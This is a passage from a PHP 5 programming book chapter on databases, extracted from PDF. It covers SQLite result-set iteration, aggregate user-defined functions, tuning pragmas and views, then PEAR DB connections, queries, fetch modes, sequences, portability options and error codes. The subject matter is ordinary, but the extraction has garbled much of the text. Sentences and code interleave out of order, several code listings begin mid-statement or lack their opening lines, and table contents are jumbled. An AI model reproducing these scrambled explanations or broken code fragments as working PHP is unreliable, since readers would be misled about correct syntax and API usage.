id = {$this->id}"); } }

198 Gutmans_ch06 Page 170 Thursday, September 23, 2004 2:43 PM 170 Databases with PHP 5 Chap. 6 This is our class definition with only two interesting things to mention. The names of the properties are the same as the name of the fields in the data- base. This way, they will be automatically filled in with the property visibility field is a public property. The second inter- intro level. As you can see, only the save() esting part is the method that executes an update query with the new intro $id property to update the correct record. data. It uses the stored $result = $db->query( "SELECT * FROM document WHERE body LIKE '%conf%'"); $obj1 = $result->fetchObject('Article', NULL); Here, we execute our query, fetch the first record as an object of class article , and pass as only a parameter to the constructor of that class the value true (which we don’t use, though). $obj1->intro = "This is a changed intro"; $obj1->save($db); ?> This last part of the code changes the intro property of the object and save() method to save the changed data into the database. then calls the 6.3.3.9 Iterators There is another way to navigate through a result set, and iterator that is with an iterate over the result set does . Using an iterator to not involve calling any functions, so it is therefore a bit faster than when you would use one of the fetch functions. In this example, we present the search.php script to find an email matching certain words: \n\n"; return; } function escape_word(&$value) { $value = sqlite_escape_string($value); } $search_words = array_splice($argv, 1); array_walk($search_words, 'escape_word'); $words = implode("', '", $search_words);; The parameters that are passed to the script are the search words, which we, of course, need to escape with the function. In the sqlite_escape_string() array_walk() previous example, we use the function to iterate over the array and escape the words. After they are escaped, we construct a list of them to use in the queries with the implode() function.

199 Gutmans_ch06 Page 171 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 171 $search_query = " SELECT document_id, COUNT(*) AS cnt FROM dictionary d, lookup l WHERE d.id = l.word_id AND word IN ('$words') GROUP BY document_id ORDER BY cnt DESC LIMIT 10 "; $doc_ids = array(); $rank = $db->query($search_query, SQLITE_NUM); foreach ($rank as $key => $row) { $doc_ids[$key] = $row[0]; } $doc_ids = implode(", ", $doc_ids); ... Next, we execute the query with the query() method that returns a result handle. With the foreach loop, we iterate over the result just as we would iter- ate over an array, except that we don't actually create an array first. The itera- SQLite buffered query object fetches the data for us row by row. tor tied to the In the most ideal case, we would use an unbuffered query here, but we can't do that because we need to reuse this result set; reusing result sets is not possible with an unbuffered query because the data is not buffered, of course. 6.3.3.10 Homegrown Iteration To more clearly see how the iterator inter- doing all the magic), foreach nally works, you can also do it manually (without as is shown here in the second part of the script: $details_query = " SELECT document_id, substr(doc.body, position - 20, 100) FROM dictionary d, lookup l, document doc WHERE d.id = l.word_id AND word in ('$words') AND document_id IN ($doc_ids) AND document_id = doc.id GROUP BY document_id, doc.body "; $result = $db->unbufferedQuery($details_query, SQLITE_NUM); while ($result->valid()) { $record = $result->current(); $list[$record[0]] = $record[1]; $result->next(); }

200 Gutmans_ch06 Page 172 Thursday, September 23, 2004 2:43 PM 172 Databases with PHP 5 Chap. 6 $result By default, the points to the first row when iterating, and the method returns the current record (indexed in the way indicated by current() method, you can the second parameter to unbufferedQuery() ). With the next() advance to the next record in the result set. There are a few more methods that you can use; the next table shows which ones, and also lists the proce- dural functions for them. The first parameter to the procedural interface func- tions is always the result handle, and this one is not listed in Table 6.12. Result Set Navigation Functions and Methods Table 6.12 Description Method Name $result->seek() Seeks to a row in the result set. The only parameter is the sqlite_seek() zero-based record number in the set. This function can only be used for buffered result sets. $result->rewind() Rewinds the result pointer to the first record in the result sqlite_rewind() set. This function can only be used for buffered result sets. $result->next() Advances to the next record in the result set. sqlite_next() $result->prev() Moves the result pointer back to the previous record in sqlite_prev() the result set. This function can only be used for buffered result sets. $result->valid() Returns whether more record are available in the result set. sqlite_valid() sqlite_has_more() $result->hasPrev() Returns whether a previous record is available. This sqlite_has_prev() function can not be used in unbuffered queries. Now, only the last part of our search script follows—the part where we actually output the results: foreach ($rank as $record) { echo $record[0], "\n====\n...", $list[$record[0]], "...\n---------\n"; } ?> Here, we just reiterate over our first query result and use the message ID as key to the result set to display the relevant parts of the emails found. You can use a few other func- 6.3.3.11 Other Result Set-Related Functions tions and methods on result sets. The method numFields() (sqlite_num_fields()) returns the number of fields in the result set, and the method returns the name of the field. The fieldName() (sqlite_field_name()) only parameter to this method is the index of the field into the resultset (zero- based). If you do make a join between multiple tables, notice that this function returns the name of the field “as-is” from the query; for example, if the query , the name of the field that is "SELECT a.field1 FROM address a" contains . "a.field1" returned will be

201 Gutmans_ch06 Page 173 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 173 Another peculiarity with column names, which is also valid for keys in returned arrays with the SQLITE_ASSOC option set, is that they are always state- returned in the same case as they were created in the "CREATE TABLE" php.ini to 1 , you force the ment. By setting the sqlite.assoc_case option in , you SQLite extension to return uppercase column names. By setting it to 2 force the extension to return lowercase column names. A setting of 0 (the default) does not touch the case of column names at all. The method ( ) returns the number of records numRows() sqlite_num_rows() in the result set, but only works for buffered queries. Besides normal UDFs similar 6.3.3.12 Aggregate User Defined Functions to those we used to generate our index from a trigger, it is also possible to define a UDF for aggregation functions. In the following example, we calculate the average length of the words in our dictionary:

202 Gutmans_ch06 Page 174 Thursday, September 23, 2004 2:43 PM 174 Databases with PHP 5 Chap. 6 $db->createAggregate( 'average_length', 'average_length_step', 'average_length_finalize' ); createAggregate() method creates our aggregate function. The first The parameter is the name of the function that can be used from SQL queries; the ); step second one is the function that is executed for each record (also called and the third parameter is the name of the function that is run when all records are selected. $avg = $db->singleQuery( "SELECT average_length(word) FROM dictionary"); echo "$avg\n"; ?> Here, we simply execute the query using our newly defined function and echo the result, which should look like something like this: Average over 28089 words is 10.038 chars. 6.3.3.13 Character Encoding SQLite has support for two character sets: ISO- 8859-1, which is the default and used for most western-European languages, and UTF-8. To enable UTF-8 mode, you need to tell the PHP ./configure com- enable-sqlite-utf8 . mand to do so. The switch to use SQLite’s UTF-8 mode is -- This option only affects sorting results. We already saw that you can speed up large amounts of 6.3.3.14 Tuning inserts by encapsulating the queries into a transaction. But, there are a few more tricks that we can do. Usually, when inserting a lot of data into the data- base, we're not interested in how many changes there were in the result set. SQLite allows you to turn off the counting of changes, which obviously improves speed during insertion. You can instruct SQLite not to count changes by running the following SQL query: PRAGMA count_changes = 0 For example, with $db->query("PRAGMA count_changes = 0"); Another trick is to change the way SQLite flushes data to disk. With the synchro- nous pragma, you can switch between the following modes, as shown in Table 6.13. Table 6.13 “PRAGMA Synchronous” Options Description Mode OFF SQLite will not flush written to disk at all; it's up to the operating system to handle this. ON/NORMAL (default) In this mode, SQLite will make sure the data is committed to disk by issuing the system call once in a while. fsync() FULL SQLite will now issue extra fsync() s to reduce the risk of corruption of the data in case of a power loss.

203 Gutmans_ch06 Page 175 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 175 In situations where there are a lot of reads from the SQLite database, it might be worthwhile to increase the cache size. Where the default is 2,000 pages (a page is 1,536 bytes), you can increase this size with the following query: PRAGMA cache_size=5000; This setting only has effect for the current session, and the value will be lost when the connection to the database is broken. If you want to persist this set- cache_size ting, you need to use the default_cache_size . pragma instead of just 6.3.3.15 Other Tricks There are still a few things untold about SQLite—for example, what the method is to query the database structure. The answer is easy—by using the following query: SELECT * FROM sqlite_master This returns one element per database object (table, index, and trigger) with the following information: type of object, the name of the object, the table to which the object is linked (only useful for indexes and triggers), an ID, and the SQL DDL query to create the object. When executed on our example, the result is shown in Table 6.14. Dump Table 6.14 sqlite_master Table ID Name Type SQL DDL CREATE TABLE document ( table document document 3 id INTEGER PRIMARY KEY, title, intro, body ) CREATE TABLE dictionary ( 4 table dictionary dictionary id INTEGER PRIMARY KEY, word ) CREATE TABLE lookup ( lookup lookup 5 table document_id INTEGER, word_id INTEGER, position INTEGER ) CREATE UNIQUE INDEX word ON dictionary 6 index word dictionary(word) CREATE TRIGGER index_new AFTER trigger index_new document 0 INSERT ON document BEGIN SELECT php_index(new.id, new.title, new.intro, new.body); END

204 Gutmans_ch06 Page 176 Thursday, September 23, 2004 2:43 PM 176 Databases with PHP 5 Chap. 6 views , an SQL feature to simplify user-land The last thing to discuss are "document_body_id" queries. For example, if we want to create a view called body fields of the document table, we can execute and id that contains only the the following query: CREATE VIEW document_id_body AS SELECT id, body FROM document; After the view is created, you can use it in SQL queries just like it was a real table. For example, the following query uses the view to return the ID and body fields of the first two record of our document table: SELECT * FROM document_id_body LIMIT 2; Of course, in this case, it doesn’t really make sense to create a view on one table only, but it does make sense to create a view over a complex query that joins multiple tables. Another original idea of views was that you can assign permissions to specific views as though they were tables, but of course, that doesn’t make sense with SQLite, which doesn’t know anything about per- missions except for permissions on the file system where the database file resides. 6.3.3.16 Words of Wisdom At last, here are some words of wisdom from the author of the SQLite engine, which he uses instead of a copyright notice: ☞ May you do good and not evil. ☞ May you find forgiveness for yourself and forgive others. ☞ May you share freely, never taking more than you give. — D. Richard Hipp 6.4 PEAR DB DB is The most commonly used PEAR package for database access is PEAR DB. a database abstraction layer that provides a single API for querying most of the databases supported by PHP, as well as some more database-specific things in a portable way, such as sequences and error handling. PEAR DB itself is written in PHP, and has drivers for most of PHP’s database extensions. In this section, you learn how to use PEAR DB, and when it makes sense to use PEAR DB instead of using one of PHP's database extensions natively. 6.4.1 Obtaining PEAR DB To install PEAR DB, you need the PEAR Installer that is installed along with PHP. Use the following command: $ pear install DB If you have problems, see Chapter 10, “Using PEAR.”

205 Gutmans_ch06 Page 177 Thursday, September 23, 2004 2:43 PM 6.4 PEAR DB 177 6.4.2 Pros and Cons of Database Abstraction The two main advantages of using a database abstraction layer such as PEAR DB are A single API is easy to remember. You are more productive when you ☞ spend less time looking up the documentation. A single API allows other components to use the DB API for generic ☞ DBMS access, without worrying about back-end specifics. Because DB is implemented in PHP, these advantages come at a cost: ☞ A layer written in PHP is slower than using built-in PHP functions, espe- cially if running without an opcode cache. ☞ The extra layer of code adds complexity and potential error sources. Deciding the right choice for you depends on your needs. Requirements that speak for using PEAR DB or another form of abstracted DBMS access are portability, reusability, rapid development, or that you already use other PEAR packages. Some requirements that speak against using PEAR DB are high perfor- mance requirements where the database itself would not be the bottleneck, a significant buy-in with some specific DBMS product, or a policy of avoiding external dependencies. 6.4.3 Which Features Are Abstracted? DB does not abstract everything, such as SQL or database schema grammar. The features it does abstract are Database connections ☞ ☞ Fetching results Binding input variables (prepare/execute) ☞ ☞ Error reporting Sequences ☞ ☞ Simple database and table descriptions Minor quirks and differences ☞ The following are not abstracted, either because they are outside the scope of DB, too expensive, or simply not yet implemented: SQL syntax ☞ Database schemas ( ☞ , for example) CREATE TABLE Field types ☞ ☞ Character encodings ☞ Privilege management ( GRANT , and so on)

206 Gutmans_ch06 Page 178 Thursday, September 23, 2004 2:43 PM 178 Databases with PHP 5 Chap. 6 Database schemas and field types are abstracted by the MDB package, which is another database abstraction layer found in PEAR. MDB is a merge of Metabase and DB, two of the most popular database abstraction layers for PHP. The intent behind MDB has been to merge with the next major DB release. 6.4.4 Database Connections PEAR DB borrows the term data source name (DSN) from ODBC to describe how a database is addressed. DSNs use the uniform resource identificator 6.4.4.1 Data Source Names (URI) format. This is an example DSN that refers to a mysql database on local- host called "world" : mysql://user:password@host/world The full DSN format is a lot more verbose than this, and most fields are optional. In fact, only the database extension name is mandatory for all drivers. The database extension determines which DB driver is used, and which other DSN fields are required depends on the driver. These are some example DSNs: dbext dbext://host dbext://host/database dbext://user:pw@host/database dbext://user:pw@host dbext(dbtype)://user:pw@protocol+host:port//db/file.db?mode=x dbext is the database back-end driver. The drivers bundled with DB are , fbsql , ibase , ifx dbase msql , mssql , mysql , mysqli , oci8 , odbc , pgsql , sqlite , and , sybase . It is possible to install additional drivers as separate packages. The syntax of the DSN URI is the same for all drivers, but which fields are required varies depending on the back-end database’s features. This section mysql for examples. Consult the PEAR DB online manual for DSN details. uses 6.4.4.2 Establishing Connections Here is an example of how to establish a database connection using PEAR DB: getMessage() . "\n"; print "Error details: " . $dbh->getUserInfo() . "\n"; exit(1); } print "Connect ok!\n";

207 Gutmans_ch06 Page 179 Thursday, September 23, 2004 2:43 PM 6.4 PEAR DB 179 "test" database using the extension. The This script connects to the mysql database server runs on localhost, and the connection will be opened as user with no password. "test" DB.php is the only file you need to include to use PEAR DB. DB::connect() is a factory method that includes the right file for your driver. It creates a driver object, initializes it, and calls the native function for creating the actual connec- DB::connect() tion. will raise a PEAR error on failure. For SQLite databases, all you need to specify is the PHP extension and the database file, like this: sqlite:///test.db will be opened from the current directory. To specify the Here, "test.db" full path, the database file name must be prefixed with yet another slash, like this: sqlite:////var/lib/sqlite/test.db 6.4.4.3 Configuration Options You can configure some of the DB behavior per connection with the method. Options are parameters that are setOption() factory method: less frequently used than the ones used in the DB::connect() $dbh->setOption("autofree", true); Each option has a name and a value. The value may be of any type, but the currently implemented options exclusively use string and integer values. Most configuration options may be changed at any time, except for the persistent and ones that affect the database connection ( ). ssl The options supported by DB are the following: persistent . (Boolean) Whether DB uses a persistent connection to the ☞ backend DBMS. ssl . (Boolean) Whether to use SSL (secure sockets layer) connections to ☞ the database (may not be available). . (integer) For adjusting debug information. 0 means no debug info, ☞ debug and 1 means some debug info. seqname_format . (string) Table or sequence name format used by emulated ☞ *printf-style format string, where DB sequences. is substituted by the %s DB sequence name. Defaults to . Changing this option after populat- %s_seq ing your database may completely break your application, so be careful! ☞ . (Boolean) Whether to automatically free result sets after que- autofree ries are finished (instead of PHP doing it at the end of the request if you forget to do it yourself). portability . (integer) Bitmap telling what features DB should emulate ☞ for inter-DBMS portability; see the “Portability Features” section later in this chapter for more details.

208 Gutmans_ch06 Page 180 Thursday, September 23, 2004 2:43 PM 180 Databases with PHP 5 Chap. 6 6.4.5 Executing Queries There are four ways of running queries with PEAR DB. All are performed , limitQuery() , query() by calling different methods in the connection object: simpleQuery() . An explanation of each follows. prepare()/execute() , or 6.4.5.1 query($query, $params = array()) This is the default way of calling queries if you don’t need to limit the number of results. If the result query() returns a result object; otherwise, it contains one or more rows, returns a Boolean indicating success. Here is an example that returns results: \n"); $dbh = DB::connect("mysql://test@localhost/world"); $result = $dbh->query("SELECT Name FROM City WHERE " . "CountryCode = 'NOR'"); while ($result->fetchInto($row)) { print "$row[0]
\n"; } This example uses the database referenced in the previous "world" MySQL section. method returns a query() object. DB_result ’s f etchInto() DB_result Here, the $row array. When the last method retrieves a row of results and stores it in the fetchInto() row has been read, null . Continue reading for more details returns f etchInto() fetch methods. The query() method also accepts about and the other an additional parameter for passing input parameters to the query: \n"); $dbh = DB::connect("mysql://test@localhost/world"); $code = 'NOR'; $result = $dbh->query("SELECT Name FROM City WHERE CountryCode = ?", ➥ $code); while ($result->fetchInto($row)) { print "$row[0]
\n"; } This example does exactly the same thing as the previous one, except it prepare execute or bind if the database supports it. The other advantage of uses / passing input parameters like this is that you need not worry about quoting. DB automatically quotes your parameters for you as necessary. 6.4.5.2 limitQuery($query, $from, $count, $params = array()) This method is almost identical to query() , except that it takes a "from" and "count" parameter that limits the result set to a specific offset range. Here’s an example:

209 Gutmans_ch06 Page 181 Thursday, September 23, 2004 2:43 PM 6.4 PEAR DB 181 \n"); $dbh = DB::connect("mysql://test@localhost/world"); $result = $dbh->limitQuery("SELECT Name, Population FROM City ". "ORDER BY Population", $from, $show); while ($result->fetchInto($row)) { print "$row[0] ($row[1])
\n"; } The limitQuery() method ensures that the first result is at offset $from results are returned. $show (starting at 0), and no more than and execute($sth, $data = array()) The 6.4.5.3 prepare($query) last way of running queries is to use the execute() methods. and prepare() prepare() method will parse the query and extract input parameter The placeholders. If the back-end database supports either input parameter bind- prepare / execute paradigm, the appropriate native calls are done to ing or the prepare the query for execution. Next, the takes a prepared query along with input parameters, execute() sends the parameters to the database, executes the query, and returns either a Boolean or a DB_result object, just like the other querying methods. You may call many times for each prepared query. By using execute() execute (for example) in a loop with many prepare queries, you may save / INSERT yourself from a lot of query parsing overhead, because the database has already parsed the query and just needs to execute it with new data. prepare() and execute() regardless of whether the back-end You can use database supports this feature. DB emulates as necessary by building and executing a new query for each call. execute() Here is an example that updates the world database numbers with offi- cial numbers for Norway as of January 1, 2004: \n");

210 Gutmans_ch06 Page 182 Thursday, September 23, 2004 2:43 PM 182 Databases with PHP 5 Chap. 6 $dbh = DB::connect("mysql://test@localhost/world"); $sth = $dbh->prepare("UPDATE City SET Population = ? " . "WHERE Name = ? AND CountryCode = ?"); foreach ($changes as $data) { $dbh->execute($sth, $data); printf("%s: %d row(s) changed
\n", $data[1], $dbh->affectedRows()); } contains a reference (integer $sth Here, the query is prepared once, and or resource, depending on the driver) to the prepared query. Then the prepared UPDATE statement. query is executed once for each call, which returns This example also demonstrates the affectedRows() call. execute() the number of rows with different content after the This method is meant for data-manipulation 6.4.5.4 simpleQuery($query) queries that do not return any results beyond success or failure. Its only pur- pose is that is has slightly less overhead. It returns a Boolean that indicates suc- cess or a PEAR error on failure. Here’s an example: $dbh->simpleQuery("CREATE TABLE foobar (foo INT, bar INT)"); Nothing stops you from running SELECT s and other queries returning data simpleQuery() , but the return value will be a database extension-specific with simpleQuery() resource handle. Do not use SELECT s. for 6.4.6 Fetching Results DB_result class has two methods for fetching results and three ways of The representing a row of data. As with most native database extensions, DB offers dif- 6.4.6.1 Fetch Modes ferent ways of representing a row of data: DB_FETCHMODE_ORDERED , returning a numerically indexed array, like this: ☞ array( 0 => first column, 1 => second column, 2 => third column, ... ) ☞ , returning an associative array with column names as DB_FETCHMODE_ASSOC keys: array( "ID" => first column, "Name" => second column, "CountryCode" => third column, ... ) DB_FETCHMODE_OBJECT, ☞ returning an object with public member variables named after column names. The default fetch mode is DB_FETCHMODE_ORDERED .

211 Gutmans_ch06 Page 183 Thursday, September 23, 2004 2:43 PM 6.4 PEAR DB 183 You may change the default fetch mode by 6.4.6.2 Configuring Fetch Modes method in the connection object, like this: calling the setFetchMode() $dbh->setFetchMode(DB_FETCHMODE_ASSOC); This fetch mode then applies to any queries executed by this connection object. You may also override the default fetch mode per query with an extra parameter to the fetch methods, like this: $row = $result->fetchRow(DB_FETCHMODE_OBJECT); // or like this: $result->fetchInto($row, DB_FETCHMODE_ASSOC); 6.4.6.3 fetchRow($fetchmode = DB_FETCHMODE_ORDERED, $row = 0) This method returns an array with row data. fetchRow() returns the array or object with row data on success, NULL when reaching the end of the result set, or a DB error object. fetchInto(&$arrr, $fetchmode = DB_FETCHMODE_ORDERED, 6.4.6.4 returns DB_OK and stores the row data in $arr when a fetchInto() $row = 0) when reaching the end of the NULL row was successfully retrieved, returns result set, or returns a DB error object. As it happens, DB_OK evaluates to true NULL and evaluates to false. Provided you have an error handler set up, you can then write a loop, like this: while ($result->fetchInto($row)) { // ... do something } . It makes looping over In general, it is always better to use fetchInto() fetchRow() is really just a wrapper results easier and slightly faster because around fetchInto() . By default, the object fetch mode 6.4.6.5 Using Your Own Result Class ( ) returns a stdClass DB_FETCHMODE_OB JECT object. If you configure the fetch mode using the method DB::setFetchMode() rather than specifying the fetch mode in the fetch call, you can add an extra parameter to specify the class to use for the returned object. The only interface requirement is that the constructor must accept a sin- gle array parameter. The array passed to the constructor will have the row data indexed by column name. You can configure your own class only when controlling the fetch mode with . Here is an example that uses a class implementing a DB::setFetchMode() getter method to access row data:

212 Gutmans_ch06 Page 184 Thursday, September 23, 2004 2:43 PM 184 Databases with PHP 5 Chap. 6 class MyResultClass { public $row_data; function __construct($data) { $this->row_data = $data; } function __get($variable) { return $this->row_data[$variable]; } } PEAR::setErrorHandling(PEAR_ERROR_DIE, "%s
\n"); $dbh = DB::connect("mysql://test@localhost/world"); $dbh->setFetchMode(DB_FETCHMODE_OBJECT, "MyResultClass"); $code = 'NOR'; $result = $dbh->query("SELECT Name FROM City WHERE CountryCode = ?", $code); ➥ while ($row = $result->fetchRow()) { print $row->Name . "
\n"; } 6.4.7 Sequences Database sequences are tricky portabilitywise because they are part of the SQL grammar in some databases, such as Oracle, or implemented as side effects, such as MySQL’s INSERT feature. The different ways AUTO_INCREMENT of handling sequences cannot be mixed easily. To provide a single API, DB offers a third way to deal with sequences, which is different from both of these, but at least works for any database supported by DB: \n"); $dbh = DB::connect("mysql://test@localhost/world"); $dbh->query("CREATE TABLE foo (myid INTEGER)"); $next = $dbh->nextId("foo"); $dbh->query("INSERT INTO foo VALUES(?)", $next); $next = $dbh->nextId("foo"); $dbh->query("INSERT INTO foo VALUES(?)", $next); $next = $dbh->nextId("foo"); $dbh->query("INSERT INTO foo VALUES(?)", $next); $result = $dbh->query("SELECT * FROM foo"); while ($result->fetchInto($row)) { print "$row[0]
\n"; } $dbh->query("DROP TABLE foo"); #$dbh->dropSequence("foo");

213 Gutmans_ch06 Page 185 Thursday, September 23, 2004 2:43 PM 6.4 PEAR DB 185 last-insert-id calls, or even The paradigm is not to use auto-increments, as part of the query. Instead, you must call a driver "sequencename.nextid" function to generate a new sequence number for the specific sequence that you then use in your query. The sequence number generation is still atomic. The only disadvantage with this approach is that you depend on PHP code (DB) to make the right sequences for you. This means that if you need to obtain sequence numbers from non-PHP code, this code must mimic PHP’s behavior. "2" "1" "3" . Running this , , and This example displays three lines with script repeatedly will not restart the output at "4" and so 1 , but continue with dropSequence() line call, the on. (If you uncomment the last line with the "1" .) sequence will be reset and the output will start with The methods for dealing with sequences are the following: . nextId() returns the next sequence num- nextId($seqname, $create = true) $seqname . If the sequence does not exist, it will be created if $create ber for is true (the default value). . Creates a sequence or a sequence table for data- createSequence($seqname) bases that do not support real sequences. The table name is the result of sprintf($dbh->getOption("seqname_format"), $seqname) . dropSequence($seqname) . Removes the sequence or sequence table. Subsequent for the same $seqname will re-create and reset the sequence. calls to nextId() 6.4.8 Portability Features Portability in PEAR DB is a balance between performance and portability. Dif- ferent users have different needs, so from DB 1.6, you have the option of enabling or disabling specific portability features. Older versions of DB had a catch-all “optimize for speed” or “optimize for portability” setting that is depre- cated and not covered here. portability Portability features are controlled with the configuration option (see “Configuration Options” earlier in this chapter). To combine more than one feature, use a bitwise OR, such as this: $dbh->setOption("portability", DB_PORTABILITY_RTRIM | DB_PORTABILITY_LOWERCASE); Option: 6.4.8.1 Count Deleted Rows DB_PORTABILITY_DELETE_COUNT Some DBMSs, such as MySQL and SQLite, store tables in a single file, and deleting all the rows in the table is simply a matter of truncating the file. This is fast, but you will not know how many rows were deleted. This option fixes that, but makes such deletes slower. In MySQL 4, this has been fixed so you do not need this option if you use MySQL 4.0 or newer.

214 Gutmans_ch06 Page 186 Thursday, September 23, 2004 2:43 PM 186 Databases with PHP 5 Chap. 6 Option: DB_PORTABILITY_NUMROWS 6.4.8.2 Count Number of Rows returns SELECT When working with Oracle, you will not know how many rows a without either doing a query or fetching all the rows. This option ensures COUNT method always returns the number of rows in the $result->numRows() that the oci8 ). result set. This is not needed for other drivers than Oracle ( DB_PORTABILITY_LOWERCASE 6.4.8.3 Lowercasing Option: Field name case (upper- or lowercasing letters) varies between DBMSs. Some CREATE TABLE leave the case exactly the way it was in the statement, some uppercase everything, and some are case-insensitive and others not. This option always lowercases column names when fetching results. 6.4.8.4 Trimming Data Option: DB_PORTABILITY_RTRIM Some DBMSs keep whitespace padding from CHAR fields, while others strip it off. This option makes sure there is no trailing whitespace in the result data. Option: DB_PORTABILITY_NULL_TO_EMPTY 6.4.8.5 Empty String Handling NULL Oracle does not distinguish between and '' (the empty string) when insert- ing text fields. If you fetch a row into which you just inserted an empty string, that field will end up as NULL . This option helps making this consistent by results to empty strings. NULL always converting 6.4.8.6 Really Portable Errors! Option: DB_PORTABILITY_ERRORS This option should not have been necessary, but some error codes have been incorrectly mapped in older versions and changing the mapping would break compatibility. This option breaks backward compatibility, but fixes the error mappings so they are consistent across all drivers. If you truly want portable errors (why wouldn’t you?), use this option. To enable all the portability features, use DB_PORTABILITY_ALL . 6.4.9 Abstracted Errors Knowing how to deal with or recover from an error is an important part of any application. When dealing with different DBMS servers, you will discover that report different errors for the same issue, even if you are using ODBC. To compensate for this and make it possible to write portable PHP scripts that can handle errors gracefully, DB uses its own set of error codes to represent errors in an abstracted yet simple way. Each database driver converts the error codes or 6.4.9.1 DB Error Codes error messages from the DBMS to a DB error code. These codes are repre- sented as PHP constants. The following list contains the supported error codes and examples of situations that causes them:

215 Gutmans_ch06 Page 187 Thursday, September 23, 2004 2:43 PM 6.4 PEAR DB 187 DB_ERROR_ACCESS_VIOLATION . Missing privileges for a table, no read access ☞ to file referenced by opaque parameters, or bad username or password. DB_ERROR_ALREADY_EXISTS . Table, sequence, procedure, view, trigger, or some ☞ other condition already exists. . Cannot create table or file; the cause of problem ☞ DB_ERROR_CANNOT_CREATE is outside the DBMS. ☞ DB_ERROR_CANNOT_DROP . Cannot drop table or delete file; the cause of prob- lem is outside the DBMS. DB_ERROR_CONNECT_FAILED ☞ . Could not establish database connection. . Foreign key does not exist, row contains foreign key DB_ERROR_CONSTRAINT ☞ referenced by another table, and field constraints violated. . Field may not be NULL . ☞ DB_ERROR_CONSTRAINT_NOT_NULL DB_ERROR_DIVZERO ☞ . Division by zero error. . Catch-all error. DB_ERROR_INVALID "invalid input" ☞ ☞ DB_ERROR_INVALID_DATE . Bad date format or nonsensical date. DB_ERROR_INVALID_NUMBER . Trying to use a non-number in a number field. ☞ DB_ERROR_MISMATCH . Number of parameters do not match up (also prepare / ☞ execute ). DB_ERROR_NODBSELECTED . Database connection has no database selected. ☞ . Trying to access a non-existing database. ☞ DB_ERROR_NOSUCHDB DB_ERROR_NOSUCHFIELD . Trying to query a non-existing column. ☞ ☞ DB_ERROR_NOSUCHTABLE . Trying to query a non-existing table. ☞ DB_ERROR_NOT_CAPABLE . Database back-end cannot do that. DB_ERROR_NOT_FOUND . Trying to drop a non-existing index. ☞ ☞ DB_ERROR_NOT_LOCKED . Trying to unlock something that is not locked. DB_ERROR_SYNTAX ☞ . SQL syntax error. ☞ . Returned data was truncated. DB_ERROR_TRUNCATED DB_ERROR_UNSUPPORTED ☞ . Performing an operation not supported by DB or the DBMS client. DB_ERROR_VALUE_COUNT_ON_ROW . See DB_ERROR_MISMATCH . ☞ 6.4.9.2 Graceful Error Handling DB uses the PEAR errors to report errors. Here is an example that alerts the user if he tries to add a unique combination of keys twice: setOption('portability', DB_PORTABILITY_ERRORS); $dbh->query("CREATE TABLE mypets (name CHAR(15), species CHAR(15))");

216 Gutmans_ch06 Page 188 Thursday, September 23, 2004 2:43 PM 188 Databases with PHP 5 Chap. 6 $dbh->query("CREATE UNIQUE INDEX mypets_idx ON mypets (name, ➥ species)"); $data = array('Bill', 'Mule'); for ($i = 0; $i < 2; $i++) { $result = $dbh->query("INSERT INTO mypets VALUES(?, ?)", $data); if (DB::isError($result) && $result->getCode() == ➥ DB_ERROR_CONSTRAINT) { print "Already have a $data[1] called $data[0]!
\n"; } } $dbh->query("DROP TABLE mypets"); See Chapter 7, “Error Handling,” for details on how to catch PEAR errors. 6.4.10 Convenience Methods Although PEAR DB is mostly a common API, it also contains some convenience features for retrieving all the data from a query easily. All these methods sup- / port style queries, and all of them return PEAR errors on fail- prepare execute ure. $dbh->getOne($query, $params = array()) 6.4.10.1 getOne() The method returns the first column from the first row of data. Use the $params parameter if contains placeholders (this applies to the rest of the conve- $query nience functions, too). Here’s an example: $name = $dbh->getOne('SELECT name FROM users WHERE id = ?', array($_GET['userid'])); 6.4.10.2 $dbh->getRow($query, $params = array(), $fetchmode = getRow() method returns an array with the The DB_FETCHMODE_DEFAULT) first row of data. It will use the default fetch mode, defaulting to ordered. Ordered data will start at index 0. Here’s an example: $data = $dbh->getRow('SELECT * FROM users WHERE id = ?', array($_GET['userid'])); $dbh->getCol($query, $col = 0, $params = array()) 6.4.10.3 getCol() The $col 'th element of each row. method returns an array with the defaults to 0. Here’s an example: $col $userids = $dbh->getCol('SELECT id FROM users'); 6.4.10.4 $dbh->getAssoc($query, $force_array = false, $params = array(), $fetchmode = DB_FETCHMODE_DEFAULT, $group = false) This method returns an associative array with the contents of the first column as key and the remaining column as value, like this (one line per row):

217 Gutmans_ch06 Page 189 Thursday, September 23, 2004 2:43 PM 6.4 PEAR DB 189 array(col1row1 => col2row1, col1row2 => col2row2, ...) If the query returns more than two columns, the value will be an array of $fetchmode , like this: these values, indexed according to array(col1row1 => array(col2row1, col3row1...), col1row2 => array(col2row2, col3row2...), ...) or with DB_FETCHMODE_ASSOC : array(field1 => array(name1 => field2, name3 => field3...), field2 => array(name2 => field2, name3 => field3...), ...) The $force_array parameter makes the value an array even if the query returns only two columns. If the first column contains the same key more than once, a later occur- rence will overwrite the first. $group parameter to TRUE , and getAssoc() will keep all Finally, you set the the rows with the same key in another level of arrays: $data = $dbh->getAssoc("SELECT firstname, lastname FROM ppl", false, null, DB_FETCHMODE_ORDERED, true); This example would return something like this: array("Bob" => array("Jones", "the Builder", "Hope"), "John" => array("Doe", "Kerry", "Lennon"), ...) 6.4.10.5 $dbh->getAll($query, $params = array(), $fetchmode = DB_FETCHMODE_DEFAULT) This method returns all the data from all the rows as an array of arrays. The inner arrays are indexed according to $fetchmode : array(array(name1 => col1row1, name2 => col2row2...), array(name1 => col1row2, name2 => col2row2...), ...) You can flip around the dimensions in this array by ’ing OR into fetch mode. With a fetch mode of DB_FETCHMODE_FLIPPED | DB_FETCHMODE_FLIPPED , the result will look like this: DB_FETCHMODE_ASSOC array(name1 => array(col1row1, col1row2, ...), name2 => array(col2row1, col2row2, ...), ...)

218 Gutmans_ch06 Page 190 Thursday, September 23, 2004 2:43 PM 190 Databases with PHP 5 Chap. 6 UMMARY 6.5 S and This chapter introduced two new database extensions in PHP 5: mysqli . It also presents PEAR DB, which is the most popular database abstrac- sqlite tion layer for PHP. In this chapter, you learned: ☞ mysql versus sqlite Some of the strengths and weaknesses of ☞ When it makes sense to use a database abstraction layer How to connect to databases using mysqli , sqlite , or DB ☞ ☞ Executing queries and fetching results with , sqlite , or DB mysqli Executing prepared queries with and DB ☞ mysqli The difference between buffered and unbuffered queries ☞ Various ways of fetching data from queries ☞ Database error handling ☞ ☞ Using triggers and user-defined functions with sqlite ☞ How to create portable database code with DB

